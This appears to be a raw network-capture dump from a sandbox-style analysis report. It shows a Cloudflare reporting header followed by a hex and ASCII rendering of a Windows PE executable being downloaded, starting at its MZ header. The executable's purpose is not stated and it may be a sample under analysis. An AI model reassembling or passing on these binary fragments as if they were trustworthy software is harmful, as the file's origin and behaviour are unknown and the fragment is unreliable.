                                                                                                                                                                                                  2021-11-18 09:30:32 UTC392INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 69 76 76 6c 77 62 66 4f 6b 64 73 71 6c 42 69 41 35 6c 44 43 52 5a 43 6a 43 62 37 44 51 49 34 61 36 51 64 32 74 6e 30 6a 70 55 41 58 74 65 55 64 62 49 70 36 50 75 30 66 73 6a 49 38 46 4f 32 5a 62 39 4e 77 62 6c 43 73 57 42 75 52 46 38 6a 6e 34 57 39 62 68 6d 77 4d 41 5a 5a 69 36 78 77 57 43 44 6d 30 36 53 62 50 30 67 68 4c 53 64 78 52 68 4e 67 41 45 58 4b 78 78 6e 4d 49 53 6c 4c 62 4d 55 32 78 4c 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ivvlwbfOkdsqlBiA5lDCRZCjCb7DQI4a6Qd2tn0jpUAXteUdbIp6Pu0fsjI8FO2Zb9NwblCsWBuRF8jn4W9bhmwMAZZi6xwWCDm06SbP0ghLSdxRhNgAEXKxxnMISlLbMU2xLQ%3D%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC393INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 b9 39 af 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ee 02 00 00 92 03 00 00 00 00 00 60 f7 4e 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 76 00 00 04 00 00 83 57 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL90`N @ vW,@
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC394INData Raw: cd 4c aa 4a 19 24 c5 50 39 1a cf 47 f9 61 dd 4f 45 8a c2 37 8b 4a 2a 30 78 a7 e6 15 93 06 ea 52 e3 31 f3 37 e2 1d ab 53 37 3b 75 d1 8a 42 9d be 25 67 c0 66 51 fe 3f 29 03 0e 2d 5d c1 41 3c 42 1a 48 f0 99 59 5c 1e 6f 2d 47 e0 4a 01 32 2f 3f 7a 6a e5 79 e7 4e ea 85 11 f3 c8 6f 19 d0 c2 40 b8 3a 06 2f ff 67 05 ae 5c 5c 72 05 55 a0 55 5d 44 6e d1 fc 20 3a 2c 74 65 4a d3 5c 5f ed e6 1e 43 d2 8a 10 30 4b 3c 57 79 20 46 34 e4 38 53 b0 f0 f4 df bb a6 6b 5a a4 39 46 f8 49 56 be d6 63 64 f2 f9 fe da 15 c5 57 2a 90 c5 35 a2 92 c4 35 78 33 cb cb 9e 39 24 3b 90 76 f8 45 25 48 01 34 a4 90 6b 2c 88 35 28 82 50 6c 86 35 e1 9c 8d f4 3d f8 d4 2d 2d 6b 38 37 f4 90 d5 2d ae b7 93 8a 2a 43 ae fa 93 6a 91 56 2b fd f2 b2 4a 60 db f0 48 8a d9 3b 5c d6 d4 e8 34 47 d4 2d c0 08 1e
                                                                                                                                                                                                  Data Ascii: LJ$P9GaOE7J*0xR17S7;uB%gfQ?)-]A<BHY\o-GJ2/?zjyNo@:/g\\rUU]Dn :,teJ\_C0K<Wy F48SkZ9FIVcdW*55x39$;vE%H4k,5(Pl5=--k87-*CjV+J`H;\4G-
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC395INData Raw: 61 1f f8 70 e5 56 c5 bb 34 11 e8 03 38 ff b0 7f 93 f8 bc 00 2f 47 dd c7 81 d5 3f 3c 57 0e 18 5c 32 21 6c 5f 50 69 3f 46 cd 1a 6c 00 38 68 57 15 4b 8d bf 51 30 f2 46 d2 38 da d7 4f 34 2b 36 7f 9c ff a7 27 49 d6 53 54 3f 24 71 9d 8d a6 40 33 bb 23 31 34 59 21 eb ed 81 c9 67 9d 78 91 3e 51 69 3c 85 76 3a 9a e0 ae 0c 3b 60 23 73 d3 50 0c 6c 2f cd 02 4e 2b 50 0d 78 ac bb 42 3c 8d 23 24 30 c4 aa 8f ba d6 2a 91 59 dd 46 41 f9 d0 76 22 fe 2a b6 8a 9c e2 50 dc 67 87 64 e1 77 c4 db 4c eb 60 71 fd 5a cb 34 1e 48 20 8b 77 ee c0 b7 06 3a a8 e4 34 4c 6b 1a 84 3f 1a 49 57 2b ea 0b 4d 77 ea 27 dd 9c fb cf 55 7c c6 f7 40 e5 85 a0 37 a7 6e 40 5e 3e 8d 93 07 40 2a 5b 4a 11 df bc dd f0 9e 35 15 0b c9 a5 ff fa 28 35 e1 87 e6 d9 46 b6 54 8c 62 78 46 b5 76 7f 6b 3b 58 27 be 74
                                                                                                                                                                                                  Data Ascii: apV48/G?<W\2!l_Pi?Fl8hWKQ0F8O4+6'IST?$q@3#14Y!gx>Qi<v:;`#sPl/N+PxB<#$0*YFAv"*PgdwL`qZ4H w:4Lk?IW+Mw'U|@7n@^>@*[J5(5FTbxFvk;X't
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC397INData Raw: 6e e5 58 6b a5 58 e9 cd d4 3e 7b 6f f2 70 de 5a ae 83 40 d2 8d 85 04 cc 20 bf 07 07 59 4f 35 b3 78 3b d9 53 e6 87 fb 41 5e b8 87 59 04 35 38 35 ed ee 5f 86 53 85 49 0e 2b ce c5 e7 3f 2a 27 30 c7 08 70 47 14 98 43 ce fa b0 64 33 51 74 22 d5 f6 7a 16 69 aa 4b 5b ad c5 44 7d 2a 2c 5b 15 bb e4 70 39 f2 2e 36 c5 45 e9 90 bc 4b 20 af 4c af 5a cf ee aa b0 db 59 02 8b 78 c4 4c d2 67 00 6c cf dc ae 10 77 55 60 36 40 a7 78 38 25 99 10 c1 fe ae 40 0e 77 3e 14 7b e6 74 f5 28 57 44 94 8e 50 35 40 b1 e6 90 5b 3a a2 18 d6 9c 9c cb c9 83 2a 52 7b 6b e6 d9 67 ae 58 95 0e 89 6b 79 ef b9 ab 42 38 e2 89 78 27 ed 70 ec 71 8b 6a 9b 49 09 41 2c bc 61 9d df 55 31 dd 74 01 6f e8 bb cd 91 21 e3 cf d1 82 57 b9 05 93 3d 29 7b ac 71 23 bb c3 fc 3d 38 d3 85 80 50 b5 b5 65 18 2f 6c e6
                                                                                                                                                                                                  Data Ascii: nXkX>{opZ@ YO5x;SA^Y585_SI+?*'0pGCd3Qt"ziK[D}*,[p9.6EK LZYxLglwU`6@x8%@w>{t(WDP5@[:*R{kgXkyB8x'pqjIA,aU1to!W=){q#=8Pe/l
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC398INData Raw: 03 f9 26 58 91 9f ad f4 c5 c2 67 ec 67 00 48 30 e1 68 55 c3 60 26 40 27 bd 4e fe aa 58 d6 ba da 3c f8 a9 05 a8 5e 20 e8 3b 1f 7a c4 3f 45 37 61 40 7f e1 e6 93 ab d6 6c 0b c0 05 d0 f7 00 be 26 bd 85 4d d0 d0 ff 61 ee 79 c9 ec 6d 74 5c c7 56 c6 21 b0 d3 c6 25 fe 72 53 02 de c3 ab cc 90 03 2f 27 50 4a 5e 34 f6 db 83 4a 87 e0 33 d5 31 e7 3e ca d2 3d 8f 49 3c f1 37 06 4a 18 5e 44 b9 db b0 25 d4 a8 f7 ba 77 d3 6c 5e d6 6d 37 be b1 81 03 d4 e6 5a 41 05 b8 06 73 35 1b d2 33 c3 f5 05 76 5b cc df 73 d3 3b 2d 36 39 b3 93 be 02 02 34 3d 60 20 96 3a 9a 86 a8 ee 65 b4 46 6e e3 34 fa 8c 6e bf 28 2c 5d 3e da 0c 0a bd 7e 4e 06 d7 e0 8e 5c 38 07 be cc 55 6a 3a 38 58 8a 48 35 84 d9 4f 7e 0d 91 ba 20 42 2b b8 79 b8 3c 8c cd d2 81 42 32 d7 e9 48 05 3f e8 df 98 2d b1 0c 86 0a
                                                                                                                                                                                                  Data Ascii: &XggH0hU`&@'NX<^ ;z?E7a@l&Maymt\V!%rS/'PJ^4J31>=I<7J^D%wl^m7ZAs53v[s;-694=` :eFn4n(,]>~N\8Uj:8XH5O~ B+y<B2H?-
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC399INData Raw: d4 95 e9 4e 5c 6a 4e 38 b8 f6 c7 d6 b4 01 a8 ab 92 f3 90 ad 5e 63 eb ae 36 b7 46 71 b9 93 34 9d b6 56 cb 32 0c b4 09 43 15 c1 5e 89 7e 81 f3 33 76 5d 53 41 5f 41 eb 2d 15 fb 67 be 0f 6f 06 f6 fa 61 62 5a 17 42 b3 e5 41 fb 20 13 5f 5a 39 36 cf 47 23 24 17 0b 2f fa c6 58 30 43 3c 5b 82 d3 f8 3a 84 91 44 1c 03 7f 16 5b ce f7 4f 15 5d 86 ac a7 8d f2 69 57 23 bd 6b 85 c4 2f a0 69 9c 6f d7 d9 29 9f e8 61 da 4f 3a 2f d4 82 86 ba d3 42 69 65 64 8f 6a 40 b3 11 44 75 3d 36 df 22 ca 14 0c 4b db d3 e8 30 de 8e 48 32 56 0d 38 fe 28 4e 90 3b fe 52 4b 89 1b de 47 6b 5b 2e 4f 2f 2b 79 35 bb 13 09 cf fb 7d 4d 8a ad e4 fa 70 fe af 27 8d 48 30 f6 35 07 68 99 84 f0 1d bf 88 ec c1 f5 f2 65 17 24 8c be 3b fe 51 11 15 41 99 ae e9 4d 51 17 f4 99 94 92 01 f5 9e 34 6f 12 01 36 d9
                                                                                                                                                                                                  Data Ascii: N\jN8^c6Fq4V2C^~3v]SA_A-goabZBA _Z96G#$/X0C<[:D[O]iW#k/io)aO:/Biedj@Du=6"K0H2V8(N;RKGk[.O/+y5}Mp'H05he$;QAMQ4o6
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC401INData Raw: 4c be 8e fa 3e bc 42 16 13 6b 62 c1 ad d7 5b 73 51 24 0b 17 90 54 65 07 3e a2 51 30 db 55 35 54 34 8d c0 4d 5b 89 37 d0 25 f3 6c 3e ba ad 0b 3f e6 ce d7 90 c6 87 ef 3b 26 be d3 24 d6 e3 b0 7a 5d ba 70 27 02 8e b6 3c 50 86 35 9b 31 d3 76 7e df ea de 7e fd 62 97 9b c6 53 59 36 e1 56 2f fc 8f 1d c7 27 03 28 64 37 83 be 46 25 09 55 dc ef ca fb 80 9e c9 74 38 0f cd ce fd ab 8d f9 50 a9 b6 7f 64 35 b2 87 5b 02 83 d6 e1 30 d1 c1 d1 14 4d 2b f2 7c 30 c4 aa 48 fd 26 a4 fb 4e b3 0e d2 97 5e cb 59 b3 23 d4 78 ba d2 3e 2d 47 ee 75 16 7d 2d 54 55 a3 21 79 e9 2c a5 9e d5 05 a2 98 c8 e6 4b b4 fb 34 fb f2 74 d7 71 e5 48 34 b0 d7 5c 42 da 60 3f 33 f8 d2 fa 6b 5e 3b 49 59 b0 25 50 41 d9 c1 49 78 38 c3 f8 3c d8 27 dc 09 95 83 4a f3 12 49 85 42 df 19 cc f5 76 78 2c f8 9b 52
                                                                                                                                                                                                  Data Ascii: L>Bkb[sQ$Te>Q0U5T4M[7%l>?;&$z]p'<P51v~~bSY6V/'(d7F%Ut8Pd5[0M+|0H&N^Y#x>-Gu}-TU!y,K4tqH4\B`?3k^;IY%PAIx8<'JIBvx,R
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC402INData Raw: ca 43 ee 17 da bc b6 b7 4b 6a 25 d9 27 6c a6 a3 12 7d 23 a5 b9 d4 5d 16 2f 4f c5 69 f2 c8 33 91 cb e6 45 71 d6 67 d3 7a af 97 0f 96 c5 20 64 9b 4f 49 df 86 4c 30 04 dc e7 4f 1f 69 b9 aa 23 6c 16 36 25 79 fd fe 3d d2 cc d6 ae 5b d6 cd a8 ba 9d 47 29 89 56 66 ae 30 cb 42 8b 3a 49 2d b7 31 24 f4 3a 53 92 41 4e ce a5 60 03 f2 9e 7a 7f 20 cb b3 a1 69 fa 52 7b 13 07 6d 01 77 fd 2b d1 43 5d 20 23 7f b8 c2 3c 82 c8 50 e8 7b ac dc cb 05 92 8e 05 52 ca 9c c8 32 b9 48 d4 9c 87 d5 82 cb c0 c8 ca 2a c4 aa 11 89 c6 4f c7 bd 59 4e f2 b6 38 b3 d3 55 07 0f 22 bf df 5c a3 ba 5f 3f aa 5c d6 af 5c 5b 77 59 25 20 fe cc 4f 67 74 3d 05 24 3b 1e bf 33 fa e1 89 3e 4c 51 94 ce e3 8d 6f fa 41 8c d7 66 1f 4b 3f 62 3c 42 59 8d c3 1f 79 3b 04 6c 73 25 fc 9d ef f8 7e bf 8e 2f 64 d1 41
                                                                                                                                                                                                  Data Ascii: CKj%'l}#]/Oi3Eqgz dOIL0Oi#l6%y=[G)Vf0B:I-1$:SAN`z iR{mw+C] #<P{R2H*OYN8U"\_?\\[wY% Ogt=$;3>LQoAfK?b<BYy;ls%~/dA
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC403INData Raw: ab 4e 44 4f 95 c7 b0 bb af 5b 65 ae 5c 58 22 fb 1b 5a 7c 5a 25 47 bb fa e6 ab 35 a3 53 e2 c2 d0 c5 f5 79 ea a4 98 e1 c2 31 ee 0e a1 2c 25 59 23 fc c3 fa 84 8e 3b a1 fd 8e f9 64 67 6a 5c c8 51 93 de aa 86 e4 46 65 ca 73 2a 5f fb 81 09 86 ef 75 3b 65 93 bc 06 d1 80 64 72 ac 39 81 33 89 16 55 b8 e3 4e 2a b5 e5 e6 47 ed 69 48 81 f2 12 70 a9 24 58 d6 d6 35 d2 95 69 16 f7 b2 f0 fd 61 1a 2a 4f fd 18 02 a5 01 ff fb ef 46 ea 70 c8 eb c2 4e a3 cc 00 de 72 90 86 fd a2 5b e9 c5 b8 5c 1f f3 88 8b e9 bf 4e 2a 9b 17 70 b2 b3 2c 07 7e ed 0e cc c2 a8 2b 49 a6 ed 35 91 63 59 72 7c 6f 4d 71 cc 4b ad d8 8a c5 e2 f0 47 b2 f5 4d 3d 1b db f3 3f da e2 0e 18 47 cd 6c 35 26 3a 15 df 4c de 54 fe b0 31 76 f6 cc 50 a0 c6 64 dd 86 ea e5 96 0f e6 51 ed 3c 59 d1 08 8c f2 3f ee 16 47 f3
                                                                                                                                                                                                  Data Ascii: NDO[e\X"Z|Z%G5Sy1,%Y#;dgj\QFes*_u;edr93UN*GiHp$X5ia*OFpNr[\N*p,~+I5cYr|oMqKGM=?Gl5&:LT1vPdQ<Y?G
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC405INData Raw: 68 8e e1 f1 c7 80 9b 09 38 78 9e 51 98 6b 0b 1f 20 87 c1 6b 6f 54 a4 60 ca f9 59 a2 64 f6 6b 87 2f 28 db ec b3 6f 46 d3 40 b0 47 1d 44 f0 75 c8 1b 32 b5 e6 3d 0b 92 c5 40 f0 71 98 25 c4 07 2c 05 7b 1b d6 00 87 71 0f e6 01 57 0c 74 3e 70 94 f2 4f 33 98 43 b8 b3 ab 7e 74 56 38 02 50 6d 58 ce 00 c7 1c 74 4a 4f 6e 1d 5b f2 2e fd d8 2b 4f 5d 5a ea 37 da 8f 86 85 5a 8d be ac 0f 21 8c 66 6d 44 ed a4 9b 50 3b b1 be 21 da 65 69 ae 9b 9e ee 79 54 22 f0 43 06 0b 72 db bc be 28 3f c2 34 7f 34 f9 89 65 b8 96 73 23 6d a9 08 02 01 85 74 df f1 2a 44 27 a8 06 5c 67 b0 b6 68 21 10 d0 cb 4e 2b 14 0f c4 e7 60 3f 79 cc cf 31 55 e6 db 34 45 1d 7d c4 8b ca 64 47 40 92 80 c9 87 3a da f1 57 30 26 f0 2e ef 4f 9c 80 9c 7d 49 a7 5e 94 30 9a 65 2b 09 29 87 c0 5b a1 fb 2d da a3 17 49
                                                                                                                                                                                                  Data Ascii: h8xQk koT`Ydk/(oF@GDu2=@q%,{qWt>pO3C~tV8PmXtJOn[.+O]Z7Z!fmDP;!eiyT"Cr(?44es#mt*D'\gh!N+`?y1U4E}dG@:W0&.O}I^0e+)[-I
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC406INData Raw: 37 84 4c 41 de 62 53 3f ea 22 50 32 d3 f0 32 ac 6c 4f 24 52 4c bf 60 f1 ef dc 8a 27 4c de 45 ee f4 8b 82 cc 1f df ec 87 e6 fa bf 4c f6 d6 12 52 5e 25 2a ec e0 da 41 c8 cf 6a 49 04 30 12 f0 29 0b b1 65 6c 58 4b ed a8 2f 7c ce 3c d4 cb db 88 b3 84 02 55 fb 1a 44 90 fa 97 72 2d 93 5f 0f 41 79 48 a7 43 4e 39 79 00 f3 d9 27 e6 10 48 c1 b0 8b 5c a6 83 e3 d4 9d ac 18 f0 04 ed da e6 30 f4 9a 17 d5 3f 35 b0 6d 0a de 77 db 42 38 d4 16 ad da e6 01 15 2d b0 d2 15 2c 2d 01 b2 6c bc 89 a5 6f f0 15 47 d0 c6 ca 75 56 55 bd e0 fe cf 37 ac b4 72 3f ab 42 7e 17 0c e7 e9 e1 c1 57 e0 e2 01 05 e3 fe ae f7 32 52 f3 58 57 c4 e4 2a 2f 3d c4 b8 ff f8 be 20 c7 66 d7 d3 e4 91 66 0a 65 35 f0 5f ef f4 8a 76 d5 48 06 bf a7 37 ef f1 e0 62 a8 92 b6 97 48 47 c6 9e 0b 54 46 2d c4 5b 1b 93
                                                                                                                                                                                                  Data Ascii: 7LAbS?"P22lO$RL`'LELR^%*AjI0)elXK/|<UDr-_AyHCN9y'H\0?5mwB8-,-loGuVU7r?B~W2RXW*/= ffe5_vH7bHGTF-[
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC407INData Raw: a9 3b 52 37 b1 8c 36 9f 8d 75 6f b9 8a a5 b5 ec f5 13 4d 0a d5 a2 3a 51 64 99 69 3f e9 a3 08 d2 42 89 bb d4 0c f5 68 5e 72 df 96 e6 22 4f 9e 7d 93 dc b8 d2 69 d0 cc 6f 77 6a 55 a9 35 50 a4 d7 4e c3 de 77 fe 72 f6 f3 85 e7 f1 d4 2a f5 50 4f 12 cb d8 7f d0 db e8 da b8 8a d3 2b e9 d2 60 d0 d0 82 e8 e7 fa 6b 6f f3 ee de 14 d8 bb 6b a6 b7 41 1c 24 aa c8 9e d7 eb 7d 47 09 32 38 83 77 3c 60 49 59 ea 0a 56 53 96 e4 35 cf fa 09 5e e1 bb d0 05 8e 77 ef 66 ac f7 f5 35 22 50 cc 55 a6 4a 91 35 c3 ba 25 5d 5b ee a9 66 8e 5b fa cb 3a c0 90 40 cd 0b 07 ed 8c a5 c9 73 3e 0b 08 98 02 71 29 01 f8 4b 2e 97 73 7c 78 49 b0 ad 1c 10 4f da cc 8e fa bd a6 49 9f aa 29 dc 8e 00 47 fd f3 1e 29 dc 4f ab bc 12 4f ae 12 b6 13 da ba 9c cf 5c 94 98 ee 74 51 18 a6 13 96 b8 cf 27 6a 82 cb
                                                                                                                                                                                                  Data Ascii: ;R76uoM:Qdi?Bh^r"O}iowjU5PNwr*PO+`kokA$}G28w<`IYVS5^wf5"PUJ5%][f[:@s>q)K.s|xIOI)G)OO\tQ'j
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC409INData Raw: b6 c3 67 b1 70 f0 a0 a7 48 26 27 de 2a 77 db db f7 e3 0b 74 82 58 8c f7 05 3d 4f a9 e3 f6 a6 69 38 97 df 60 c9 5c 31 67 ee c7 e2 3b 2a 55 72 74 1a e0 2d ff 65 3a 67 c7 da 59 60 5c 4f 57 32 51 99 c8 98 fc 03 27 61 87 db f8 69 be 27 62 f8 6c 6b ec ff c2 10 75 a5 13 51 11 91 ce ac 27 6b c0 75 ef 0c 6c f9 d2 f6 83 73 1f 6c 80 87 69 b2 80 3d 35 74 c6 5a 58 70 a8 57 0c 34 46 de 6d 35 ca 0a 58 58 91 ec 4c b8 64 3d db 2b 4d 50 ba c8 35 76 c6 4b f8 c6 c7 43 c3 cf 4b a5 d7 2c 92 20 9a c8 8f 4a a7 b0 ef 2b e4 91 4b 48 a8 9a 34 ec 28 cb 76 fb 3d d3 3d d6 c9 c6 43 2a 3a f4 ea a9 1d 82 47 94 7a a0 3a 0a e0 16 ae c7 7e 74 43 4a 43 ee 75 34 86 6e 44 9b 81 d4 78 39 c2 59 c6 a0 d3 d7 75 8e e6 f9 d2 90 86 6f 7b 27 54 49 13 79 fc 7f 36 3e d6 50 91 58 b9 d4 4d d3 95 b8 f1 cb
                                                                                                                                                                                                  Data Ascii: gpH&'*wtX=Oi8`\1g;*Urt-e:gY`\OW2Q'ai'blkuQ'kulsli=5tZXpW4Fm5XXLd=+MP5vKCK, J+KH4(v==C*:Gz:~tCJCu4nDx9Yuo{'TIy6>PXM
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC410INData Raw: 5c 6b 97 25 2a 3a e3 1e 50 04 d8 b0 34 6c 98 25 a5 07 ec 49 c7 5c d2 53 1f 98 4b 42 9b a0 9c 32 2a 1c 67 25 4a ec d0 5e c3 87 d2 33 76 cd 8d ca 94 46 63 2b 6b c8 6f 58 bb 00 39 ac 3e 57 ff 00 94 87 6a 34 e5 a5 d0 3b db e0 ce ab e2 78 66 47 4f 6b 74 26 75 c8 b4 c1 ca ca e9 2d 81 d5 58 8b 76 7f 49 86 37 d4 84 75 d8 d1 a5 53 df e6 a5 ac 36 50 38 72 35 5a 2f 16 39 d5 5a bf 23 ac bd 4a b4 4d 90 ff 18 c6 3e c6 a3 4b ac 24 77 a2 d5 3d 9e 02 c5 53 dc 41 0b be 07 e7 f2 3c 72 98 1a 6f 03 5e ac c2 ca e8 f0 45 81 28 15 bd 1b 41 12 0e ba c3 e5 32 58 24 04 b0 0f da f1 31 b5 07 89 b0 f8 30 ea 35 09 03 f8 b9 77 b8 81 2a eb 3e 48 7b f1 b5 7d bd a2 2e 4a 55 4f 93 3b 95 26 ad 51 37 ec fc d5 82 65 3f d1 ce 34 80 6b 5c 5d 3e d5 bf 4a 86 df 70 ef 30 43 d1 5c b7 57 40 10 3a c2
                                                                                                                                                                                                  Data Ascii: \k%*:P4l%I\SKB2*g%J^3vFc+koX9>Wj4;xfGOkt&u-XvI7uS6P8r5Z/9Z#JM>K$w=SA<ro^E(A2X$105w*>H{}.JUO;&Q7e?4k\]>Jp0C\W@:
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC412INData Raw: f6 5c cd a9 46 25 44 69 cd d4 6b 88 b8 c5 c3 6d 46 53 e7 4b 4a 83 b6 8e 4f 29 37 48 ad cb 5a dd 92 63 7e 2a d4 d0 cf 0b 20 fe a6 f2 97 fd 76 2e cc ed 98 79 b2 c4 49 f2 39 45 12 b4 80 ab 63 90 91 9c 35 81 50 b8 b5 71 87 3e d6 a5 04 69 4a 50 31 db b4 65 3b 47 a1 c4 0c 22 77 8c 9d d9 5b e0 f0 ca d4 a6 c4 0a f7 d7 c6 b0 ce 71 55 96 00 74 4b f1 96 1d 25 3c f4 b6 0b 0b 34 ca 65 23 cf 8e 39 7d 0c 2c 5b 11 55 7b 59 57 a2 74 94 c7 46 7f 95 62 71 3d 3b b0 3b 41 31 f8 e4 bc 07 c1 34 68 48 9d 42 79 7d 39 0d fc e5 11 2f cc 79 98 16 f4 d4 8d 83 6a 46 23 ae 24 14 fe b5 cc bb 3e 77 8b f7 1b 2b 11 87 bb 0f f6 c4 fa de 7d ab 55 40 35 ab 44 9c ec 85 57 a4 9c 09 d8 34 7c e5 b5 e2 20 61 3b 37 4b 20 d8 46 7d 91 16 98 f4 c7 23 80 34 4e ae 41 27 91 ed 46 ba 0e 9a 66 14 ad a5 ff
                                                                                                                                                                                                  Data Ascii: \F%DikmFSKJO)7HZc~* v.yI9Ec5Pq>iJP1e;G"w[qUtK%<4e#9},[U{YWtFbq=;;A14hHBy}9/yjF#$>w+}U@5DW4| a;7K F}#4NA'Ff
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC413INData Raw: d9 e0 d5 fb 62 cd 4e b1 23 5b bf 68 70 c2 81 35 26 c7 7f 7d d7 dc 36 c4 17 78 34 64 00 3f f4 3b 23 e3 76 e9 d0 36 37 19 0b 97 d8 70 e9 25 23 07 f0 4f 90 e1 e0 41 0f ca 1b 3e 40 05 c1 60 36 b2 df d3 4f ad ef ee 7d b4 4c 98 00 a7 c0 5f 7f 42 c2 2f 51 7e c0 98 5d a1 99 80 4c 4e a6 48 7a b8 95 38 6f 2c ad 10 8b 7c c3 82 49 7d 5d b3 3e 77 c3 5e 4d 41 6a 7a 39 43 c7 b3 0e bf 06 1b d8 6c 9a 41 24 0a 95 55 45 47 aa 50 5c 0d ee be 5a ba e7 55 2c 7b a1 2a 00 15 ca b6 6b fc 5d b2 69 77 89 b1 5e 82 c4 0b 2c 19 b0 4d 45 4d ab 2d 27 ef 65 ac ba 2e 7e 9c 7a 50 7e b5 70 2a c3 cd fc 81 d5 22 f1 79 e4 35 01 4f 23 0c 38 8e 81 2b 59 8a c4 3b 4b 21 87 ba ac 76 fb c3 e6 6e 85 95 cb 6c c6 4e 28 b6 fb a0 c4 30 6e 42 3e 77 20 67 59 69 33 10 3d fb 0e 7d a7 1a 51 df 0b 0a 7b 86 7a
                                                                                                                                                                                                  Data Ascii: bN#[hp5&}6x4d?;#v67p%#OA>@`6O}L_B/Q~]LNHz8o,|I}]>w^MAjz9ClA$UEGP\ZU,{*k]iw^,MEM-'e.~zP~p*"y5O#8+Y;K!vnlN(0nB>w gYi3=}Q{z
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC414INData Raw: b5 0d 1d 51 73 50 6d 21 d5 c8 43 62 3c 4e 63 2d 3d 5f 98 08 f3 df 26 da 80 53 df a6 73 af 6f 33 f5 db 85 ef 60 c9 4c 50 6b d0 df 4f ce cc 5d 4b c1 12 7f 93 af 14 47 d2 52 31 f2 49 87 0b 32 f8 91 29 25 a8 84 5b 9c 6e d0 53 68 ee 86 ed d1 94 3f 32 50 11 4e 28 2f b2 98 f7 ce 13 c7 1f 91 f9 2e e7 5a 5f 6f dc 25 ed 5a 05 c7 92 be 24 7d d0 55 a0 47 29 66 a4 5a a9 2b 18 5d a2 e8 5d 39 50 f0 06 34 3d 74 8d 9c f1 85 af c5 c7 a1 32 a9 5d c3 76 b9 bc 84 0f 3f 66 85 2e 86 d3 7f 41 8f a6 19 49 6a 38 2e ab eb 54 94 6f 27 d0 b5 58 9f ea 01 c6 6b a4 25 1b 0f a9 54 01 64 6a 32 cc 40 c6 b3 d0 07 75 e7 c5 bb 12 b7 34 4d bb a7 cc 71 5f 57 e4 9a bf 13 ff 44 e3 71 0e 3b 9b b0 54 63 ea af 04 d1 97 3f d2 40 b2 b0 c8 80 ca 86 0b 5c 91 94 c0 c7 4c 0c 70 96 68 67 90 08 4a a0 a3 bd
                                                                                                                                                                                                  Data Ascii: QsPm!Cb<Nc-=_&Sso3`LPkO]KGR1I2)%[nSh?2PN(/.Z_o%Z$}UG)fZ+]]9P4=t2]v?f.AIj8.To'Xk%Tdj2@u4Mq_WDq;Tc?@\LphgJ
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC416INData Raw: 7a 77 45 5d ed 82 5d 25 d8 5f d3 30 02 31 cf 78 5a b4 b1 cb 3b a5 aa d3 c5 f0 29 e5 cc a9 b0 00 49 f0 fe 16 4e be ad e7 d0 ed 60 ce 50 28 49 5b 08 52 c2 64 56 88 0f 94 fd b4 33 b9 38 25 ba a5 8a bc 38 97 64 87 98 8e 1a 4b dc c7 2c 64 99 74 20 4a 97 bc c5 71 dc 75 65 48 5f 1f 3a 66 93 94 00 48 a0 a9 89 76 56 5c 00 dc ec 24 0e 7c 3f a0 ce b9 c3 ec 64 2c ce 0c c6 53 c0 87 38 29 96 e3 e9 4f 6b 9e 10 86 c0 57 e4 e9 1c 10 06 7f 95 65 24 a8 4f 40 cc 6a c0 7c 07 be 30 d0 9e ca c7 c9 a6 05 c7 f5 97 74 06 8c c9 53 50 48 73 e5 76 9e 58 47 f4 3d ef 0f d6 97 3b ad fa 11 ed 66 58 9a a8 6b da 98 7f a5 55 1f 6c 66 cd 9b e6 c1 1a b0 5c 0a 28 1b 54 6a 3b fe 88 09 a7 aa aa f3 ea a8 92 71 24 1e 42 ad 0d 5d ff 88 7a 15 c8 e7 70 44 4a 46 5b 15 83 b5 dd 66 74 b4 e0 5a b0 8c 1d
                                                                                                                                                                                                  Data Ascii: zwE]]%_01xZ;)IN`P(I[RdV38%8dK,dt JqueH_:fHvV\$|?d,S8)OkWe$O@j|0tSPHsvXG=;fXkUlf\(Tj;q$B]zpDJF[ftZ
